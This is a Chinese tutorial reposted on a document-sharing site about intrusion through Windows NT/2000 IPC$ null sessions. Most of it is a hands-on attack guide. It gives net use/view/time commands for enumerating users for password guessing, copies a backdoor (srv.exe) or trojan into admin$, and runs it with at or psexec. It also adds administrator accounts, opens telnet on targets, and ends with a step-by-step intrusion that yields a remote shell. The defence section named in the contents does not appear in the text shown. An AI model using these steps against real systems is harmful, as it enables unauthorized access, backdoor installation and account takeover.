IPC漏洞与防范.docx

资源描述

IPC漏洞与防范.docx

《IPC漏洞与防范.docx》由会员分享，可在线阅读，更多相关《IPC漏洞与防范.docx（18页珍藏版）》请在冰豆网上搜索。

IPC漏洞与防范.docx

IPC漏洞与防范

一摘要

二什么是ipc$

三什么是空会话

四空会话可以做什么

五ipc$所使用的端口

六ipc管道在hack攻击中的意义

七ipc$连接失败的常见原因

八复制文件失败的原因

九关于at命令和xp对ipc$的限制

十如何打开目标的IPC$共享以及其他共享

十一一些需要shell才能完成的命令

十二入侵中可能会用到的命令

十三对比过去和现今的ipc$入侵

十四如何防范ipc$入侵

十五ipc$入侵问答精选

一摘要

注意：

本文所讨论的各种情况均默认发生在winNT/2000环境下，win98将不在此次讨论之列。

二什么是ipc$

IPC$（InternetProcessConnection）是共享"命名管道"的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。

IPC$是NT/2000的一项新功能，它有一个特点，即在同一时间内，两个IP之间只允许建立一个连接。

NT/2000在提供了ipc$功能的同时，在初次安装系统时还打开了默认共享，即所有的逻辑共享（c$,d$,e$……）和系统目录winnt或windows（admin$）共享。

所有的这些，微软的初衷都是为了方便管理员的管理，但在有意无意中，导致了系统安全性的降低。

平时我们总能听到有人在说ipc$漏洞，ipc$漏洞，其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说，一定是指微软自己安置的那个‘后门’：

空会话（Nullsession）。

那么什么是空会话呢？

三什么是空会话

在介绍空会话之前，我们有必要了解一下一个安全会话是如何建立的。

在WindowsNT4.0中是使用挑战响应协议与远程机器建立一个会话的，建立成功的会话将成为一个安全隧道，建立双方通过它互通信息，这个过程的大致顺序如下：

1）会话请求者（客户）向会话接收者（服务器）传送一个数据包，请求安全隧道的建

立；

2）服务器产生一个随机的64位数（实现挑战）传送回客户；

3）客户取得这个由服务器产生的64位数，用试图建立会话的帐号的口令打乱它，将结

果返回到服务器（实现响应）；

4）服务器接受响应后发送给本地安全验证（LSA），LSA通过使用该用户正确的口令来核实响应以便确认请求者身份。

如果请求者的帐号是服务器的本地帐号，核实本地发生；如果请求的帐号是一个域的帐号，响应传送到域控制器去核实。

当对挑战的响应核实为正确后，一个访问令牌产生，然后传送给客户。

客户使用这个访问令牌连接到服务器上的资源直到建议的会话被终止。

以上是一个安全会话建立的大致过程，那么空会话又如何呢？

空会话是在没有信任的情况下与服务器建立的会话（即未提供用户名与密码），但根据WIN2000的访问控制模型，空会话的建立同样需要提供一个令牌，可是空会话在建立过程中并没有经过用户信息的认证，所以这个令牌中不包含用户信息，因此，这个会话不能让系统间发送加密信息，但这并不表示空会话的令牌中不包含安全标识符SID（它标识了用户和所属组），对于一个空会话，LSA提供的令牌的SID是S-1-5-7，这就是空会话的SID，用户名是：

ANONYMOUSLOGON（这个用户名是可以在用户列表中看到的，但是是不能在SAM数据库中找到，属于系统内置的帐号），这个访问令牌包含下面伪装的组：

Everyone

Network

在安全策略的限制下，这个空会话将被授权访问到上面两个组有权访问到的一切信息。

那么建立空会话到底可以作什么呢？

四空会话可以做什么

对于NT，在默认安全设置下，借助空连接可以列举目标主机上的用户和共享，访问everyone权限的共享，访问小部分注册表等，并没有什么太大的利用价值；对2000作用更小，因为在Windows2000和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表，而且实现起来也不方便，需借助工具。

从这些我们可以看到，这种非信任会话并没有多大的用处，但从一次完整的ipc$入侵来看，空会话是一个不可缺少的跳板，因为我们从它那里可以得到户列表，而大多数弱口令扫描工具就是利用这个用户列表来进行口令猜解的，成功的导出用户列表大大增加了猜解的成功率，仅从这一点，足以说明空会话所带来的安全隐患，因此说空会话毫无用处的说法是不正确的。

以下是空会话中能够使用的一些具体命令：

1首先，我们先建立一个空连接（当然，这需要目标开放ipc$）

命令：

netuse\\ip\ipc$""/user:

注意：

上面的命令包括四个空格，net与use中间有一个空格，use后面一个，密码左右各一个空格。

2查看远程主机的共享资源

命令：

netview\\ip

解释：

前提是建立了空连接后，用此命令可以查看远程主机的共享资源，如果它开了共享，可以得到如下面的结果，但此命令不能显示默认共享。

在\\*.*.*.*的共享资源

资源共享名类型用途注释

-----------------------------------------------------------

NETLOGONDiskLogonservershare

SYSVOLDiskLogonservershare

命令成功完成。

3查看远程主机的当前时间

命令：

nettime\\ip

解释：

用此命令可以得到一个远程主机的当前时间。

4得到远程主机的NetBIOS用户名列表（需要打开自己的NBT）

命令：

nbtstat-Aip

用此命令可以得到一个远程主机的NetBIOS用户名列表，返回如下结果：

NodeIpAddress:

[*.*.*.*]ScopeId:

[]

NetBIOSRemoteMachineNameTable

NameTypeStatus

---------------------------------------------

SERVER<00>UNIQUERegistered

OYAMANISHI-H<00>GROUPRegistered

OYAMANISHI-H<1C>GROUPRegistered

SERVER<20>UNIQUERegistered

OYAMANISHI-H<1B>UNIQUERegistered

OYAMANISHI-H<1E>GROUPRegistered

SERVER<03>UNIQUERegistered

OYAMANISHI-H<1D>UNIQUERegistered

..__MSBROWSE__.<01>GROUPRegistered

INet~Services<1C>GROUPRegistered

IS~SERVER......<00>UNIQUERegistered

MACAddress=00-50-8B-9A-2D-37

以上就是我们经常使用空会话做的事情，好像也能获得不少东西哟，不过要注意一点：

建立IPC$连接的操作会在EventLog中留下记录，不管你是否登录成功。

好了，那么下面我们就来看看ipc$所使用的端口是什么？

五ipc$所使用的端口

首先我们来了解一些基础知识：

1SMB:

（ServerMessageBlock）Windows协议族，用于文件打印共享的服务；

2NBT:

（NETBiosOverTCP/IP）使用137（UDP）138（UDP）139（TCP）端口实现基于TCP/IP协议的NETBIOS网络互联。

3在WindowsNT中SMB基于NBT实现，即使用139（TCP）端口；而在Windows2000中，SMB除了基于NBT实现，还可以直接通过445端口实现。

有了这些基础知识，我们就可以进一步来讨论访问网络共享对端口的选择了：

对于win2000客户端（发起端）来说：

1如果在允许NBT的情况下连接服务器时，客户端会同时尝试访问139和445端口，如果445端口有响应，那么就发送RST包给139端口断开连接，用455端口进行会话，当445端口无响应时，才使用139端口，如果两个端口都没有响应，则会话失败；

2如果在禁止NBT的情况下连接服务器时，那么客户端只会尝试访问445端口，如果445端口无响应，那么会话失败。

对于win2000服务器端来说：

1如果允许NBT,那么UDP端口137,138,TCP端口139,445将开放（LISTENING）；

2如果禁止NBT，那么只有445端口开放。

我们建立的ipc$会话对端口的选择同样遵守以上原则。

显而易见，如果远程服务器没有监听139或445端口，ipc$会话是无法建立的。

六ipc管道在hack攻击中的意义

ipc管道本来是微软为了方便管理员进行远程管理而设计的，但在入侵者看来，开放ipc管道的主机似乎更容易得手。

通过ipc管道，我们可以远程调用一些系统函数（大多通过工具实现，但需要相应的权限），这往往是入侵成败的关键。

如果不考虑这些，仅从传送文件这一方面，ipc管道已经给了入侵者莫大的支持，甚至已经成为了最重要的传输手段，因此你总能在各大论坛上看到一些朋友因为打不开目标机器的ipc管道而一筹莫展大呼救命。

当然，我们也不能忽视权限在ipc管道中扮演的重要角色，想必你一定品尝过空会话的尴尬，没有权限，开启管道我们也无可奈何。

但入侵者一旦获得了管理员的权限，那么ipc管道这把双刃剑将显示出它狰狞的一面。

七ipc$连接失败的常见原因

以下是一些常见的导致ipc$连接失败的原因：

1IPC连接是WindowsNT及以上系统中特有的功能，由于其需要用到WindowsNT中很多DLL函数，所以不能在Windows9.x/Me系统中运行，也就是说只有nt/2000/xp才可以相互建立ipc$连接，98/me是不能建立ipc$连接的；

2如果想成功的建立一个ipc$连接，就需要响应方开启ipc$共享，即使是空连接也是这样，如果响应方关闭了ipc$共享，将不能建立连接；

3连接发起方未启动Lanmanworkstation服务（显示名为：

Workstation）：

它提供网络链结和通讯，没有它发起方无法发起连接请求；

4响应方未启动Lanmanserver服务（显示名为：

Server）：

它提供了RPC支持、文件、打印以及命名管道共享，ipc$依赖于此服务，没有它主机将无法响应发起方的连接请求，不过没有它仍可发起ipc$连接；

5响应方未启动NetLogon，它支持网络上计算机pass-through帐户登录身份（不过这种情况好像不多）；

6响应方的139，445端口未处于监听状态或被防火墙屏蔽；

7连接发起方未打开139，445端口；

8用户名或者密码错误：

如果发生这样的错误，系统将给你类似于'无法更新密码'这样的错误提示（显然空会话排除这种错误）；

9命令输入错误：

可能多了或少了空格，当用户名和密码中不包含空格时两边的双引号可以省略，如果密码为空，可以直接输入两个引号""即可；

10如果在已经建立好连接的情况下对方重启计算机，那么ipc$连接将会自动断开，需要重新建立连接。

另外,你也可以根据返回的错误号分析原因：

错误号5，拒绝访问：

很可能你使用的用户不是管理员权限的；

错误号51，Windows无法找到网络路径：

网络有问题；

错误号53，找不到网络路径：

ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；

错误号67，找不到网络名：

你的lanmanworkstation服务未启动或者目标删除了ipc$；

错误号1219，提供的凭据与已存在的凭据集冲突：

你已经和对方建立了一个ipc$，请删除再连；

错误号1326，未知的用户名或错误密码：

原因很明显了；

错误号1792，试图登录，但是网络登录服务没有启动：

目标NetLogon服务未启动；

错误号2242，此用户的密码已经过期：

目标有帐号策略，强制定期要求更改密码。

八复制文件失败的原因

有些朋友虽然成功的建立了ipc$连接，但在copy时却遇到了这样那样的麻烦，无法复制成功，那么导致复制失败的常见原因又有哪些呢？

1对方未开启共享文件夹

这类错误出现的最多，占到50%以上。

许多朋友在ipc$连接建立成功后，甚至都不知道对方是否有共享文件夹，就进行盲目复制，结果导致复制失败而且郁闷的很。

因此我建议大家在进行复制之前务必用netview\\IP这个命令看一下你想要复制的共享文件夹是否存在（用软件查看当然更好），不要认为能建立ipc$连接就一定有共享文件夹存在。

2向默认共享复制失败

这类错误也是大家经常犯的，主要有两个小方面：

1）错误的认为能建立ipc$连接的主机就一定开启了默认共享，因而在建立完连接之后马上向c$,d$,admin$之类的默认共享复制文件，一旦对方未开启默认共享，将导致复制失败。

ipc$连接成功只能说明对方打开了ipc$共享，并不能说明默认共享一定存在。

ipc$共享与默认共享是两码事，ipc$共享是一个命名管道，并不是哪个实际的文件夹，而默认共享却是实实在在的共享文件夹；

2）由于netview\\IP这个命令无法显示默认共享文件夹（因为默认共享带$），因此通过这个命令，我们并不能判断对方是否开启了默认共享，因此如果对方未开启默认共享，那么所有向默认共享进行的操作都不能成功；（不过大部分扫描软件在扫弱口令的同时，都能扫到默认共享目录，可以避免此类错误的发生）

要点：

请大家一定区分ipc共享，默认共享，普通共享这三者的区别：

ipc共享是一个管道，并不是实际的共享文件夹；默认共享是安装时默认打开的文件夹；普通共享是我们自己开启的可以设置权限的共享文件夹。

3用户权限不够，包括四种情形：

1）空连接向所有共享（默认共享和普通共享）复制时，权限是不够的；

2）向默认共享复制时，在Win2000Pro版中，只有Administrators和BackupOperators组成员才可以，在Win2000Server版本ServerOperatros组也可以访问到这些共享目录；

3）向普通共享复制时，要具有相应权限（即对方管理员事先设定的访问权限）；

4）对方可以通过防火墙或安全软件的设置，禁止外部访问共享；

注意：

1不要认为administrator就一定具有管理员权限，管理员名称是可以改的

2管理员可以访问默认共享的文件夹，但不一定能够访问普通的共享文件夹，因为管理员可以对普通的共享文件夹进行访问权限设置，如图6，管理员为D盘设置的访问权限为仅允许名为xinxin的用户对该文件夹进行完全访问，那么此时即使你拥有管理员权限，你仍然不能访问D盘。

不过有意思的是，如果此时对方又开启了D$的默认共享，那么你却可以访问D$，从而绕过了权限限制，有兴趣的朋友可以自己做测试。

4被防火墙杀死或在局域网

还有一种情况，那就是也许你的复制操作已经成功，但当远程运行时，被防火墙杀掉了，导致找不到文件；或者你把木马复制到了局域网内的主机，导致连接失败（反向连接的木马不会发生这种情况）。

如果你没有想到这种情况，你会以为是复制上出了问题，但实际你的复制操作已经成功了，只是运行时出了问题。

呵呵，大家也知道，ipc$连接在实际操作过程中会出现各种各样的问题，上面我所总结的只是一些常见错误，没说到的，大家可以给我提个醒儿。

九关于at命令和xp对ipc$的限制

本来还想说一下用at远程运行程序失败的原因，但考虑到at的成功率不是很高，问题也很多，在这里就不提它了（提的越多，用的人就越多），而是推荐大家用psexec.exe远程运行程序，假设想要远程机器执行本地c:

\xinxin.exe文件，且管理员为administrator，密码为1234，那么输入下面的命令：

psexec\\ip-uadministrator-p1234-cc:

\xinxin.exe

如果已经建立ipc连接，则-u-p这两个参数不需要，psexec.exe将自动拷贝文件到远程机器并运行。

本来xp中的ipc$也不想在这里讨论，想单独拿出来讨论，但看到越来越多的朋友很急切的提问为什么遇到xp的时候，大部分操作都很难成功。

我在这里就简单提一下吧，在xp的默认安全选项中，任何远程访问仅被赋予来宾权限，也就是说即使你是用管理员帐户和密码，你所得到的权限也只是Guest，因此大部分操作都会因为权限不够而失败，而且到目前为止并没有一个好的办法来突破这一限制。

所以如果你真的得到了xp的管理员密码，我建议你尽量避开ipc管道。

十如何打开目标的IPC$共享以及其他共享

目标的ipc$不是轻易就能打开的，否则就要天下打乱了。

你需要一个admin权限的shell，比如telnet，木马，cmd重定向等，然后在shell下执行：

netshareipc$

开放目标的ipc$共享；

netshareipc$/del

关闭目标的ipc$共享；如果你要给它开共享文件夹，你可以用：

netsharexinxin=c:

这样就把它的c盘开为共享名为xinxin共享文件夹了。

（可是我发现很多人错误的认为开共享文件夹的命令是netsharec$，还大模大样的给菜鸟指指点点，真是误人子弟了）。

再次声明，这些操作都是在shell下才能实现的。

十一一些需要shell才能完成的命令

看到很多教程这方面写的十分不准确，一些需要shell才能完成命令就简简单单的在ipc$连接下执行了，起了误导作用。

那么下面我总结一下需要在shell才能完成的命令：

1向远程主机建立用户，激活用户，修改用户密码，加入管理组的操作需要在shell下完成；

2打开远程主机的ipc$共享，默认共享，普通共享的操作需要在shell下完成；

3运行/关闭远程主机的服务，需要在shell下完成；

4启动/杀掉远程主机的进程，也需要在shell下完成（用软件的情况下除外，如pskill）。

十二入侵中可能会用到的命令

为了这份教程的完整性，我列出了ipc$入侵中的一些常用命令，如果你已经掌握了这些命令，你可以跳过这一部分看下面的内容。

请注意这些命令是适用于本地还是远程，如果只适用于本地，你只能在获得远程主机的shell（如cmd，telnet等）后，才能向远程主机执行。

1建立/删除ipc$连接的命令

1）建立空连接:

netuse\\127.0.0.1\ipc$""/user:

2）建立非空连接:

netuse\\127.0.0.1\ipc$"密码"/user:

"用户名"

3）删除连接:

netuse\\127.0.0.1\ipc$/del

2在ipc$连接中对远程主机的操作命令

1）查看远程主机的共享资源（看不到默认共享）:

netview\\127.0.0.1

2）查看远程主机的当前时间:

nettime\\127.0.0.1

3）得到远程主机的netbios用户名列表:

nbtstat-A127.0.0.1

4）映射/删除远程共享:

netusez:

\\127.0.0.1\c

此命令将共享名为c的共享资源映射为本地z盘

netusez:

/del

删除映射的z盘，其他盘类推

5）向远程主机复制文件:

copy路径\文件名\\IP\共享目录名，如：

copyc:

\xinxin.exe\\127.0.0.1\c$即将c盘下的xinxin.exe复制到对方c盘内

当然，你也可以把远程主机上的文件复制到自己的机器里：

copy\\127.0.0.1\c$\xinxin.exec:

6）远程添加计划任务:

at\\IP时间程序名如：

at\\127.0.0.011:

00xinxin.exe

注意：

时间尽量使用24小时制；如果你打算运行的程序在系统默认搜索路径（比如system32/）下则不用加路径，否则必须加全路径

3本地命令

1）查看本地主机的共享资源（可以看到本地的默认共享）

netshare

2）得到本地主机的用户列表

netuser

3）显示本地某用户的帐户信息

netuser帐户名

4）显示本地主机当前启动的服务

netstart

5）启动/关闭本地服务

netstart服务名

netstop服务名

6）在本地添加帐户

netuser帐户名密码/add

7）激活禁用的用户

netuesr帐户名/active:

yes

8）加入管理员组

netlocalgroupadministrators帐户名/add

很显然的是，虽然这些都是本地命令，但如果你在远程主机的shell中输入，比如你telnet成功后输入上面这些命令，那么这些本地输入将作用在远程主机上。

4其他一些命令

1）telnet

telnetIP端口

telnet127.0.0.023

2）用opentelnet.exe开启远程主机的telnet

OpenTelnet.exe\\ip管理员帐号密码NTLM的认证方式port

OpenTelnet.exe\\127.0.0.1administrator""190

不过这个小工具需要满足四个要求：

1）目标开启了ipc$共享

2）你要拥有管理员密码和帐号

3）目标开启RemoteRegistry服务，用户就可以更改ntlm认证

4）对仅WIN2K/XP有效

3）用psexec.exe一步获得shell，需要ipc管道支持

psexec.exe\\IP-u管理员帐号-p密码cmd

psexec.exe\\127.0.0.1-uadministrator-p""cmd

十三对比过去和现今的ipc$入侵

既然是对比，那么我就先把过去的ipc$入侵步骤写给大家，都是蛮经典的步骤：

[1]

\>netuse\\127.0.0.1\ipc$""/user:

admintitrators

\\用扫到的空口令建立连接　　

[2]

\>netview\\127.0.0.1

\\查看远程的共享资源

[3]

\>copysrv.exe\\127.0.0.1\admin$\system32

\\将一次性后门srv.exe复制到对方的系统文件夹下，前提是admin$开启　　

[4]

\>nettime\\127.0.0.1

\\查看远程主机的当前时间

[5]

\>at\\127.0.0.1时间srv.exe

\\用at命令远程运行srv.exe，需要对方开启了'TaskScheduler'服务　　

[6]

\>nettime\\127.0.0.1

\\再次查看当前时间来估算srv.exe是否已经运行，此步可以省略

[7]　　　　

\>telnet127.0.0.199

\\开一个新窗口，用telnet远程登陆到127.0.0.1从而获得一个shell（不懂shell是什么意思？

那你就把它想象成远程机器的控制权就好了，操作像DOS），99端口是srv.exe开的一次性后门的端口　　

[8]

\WINNT\system32>

展开阅读全文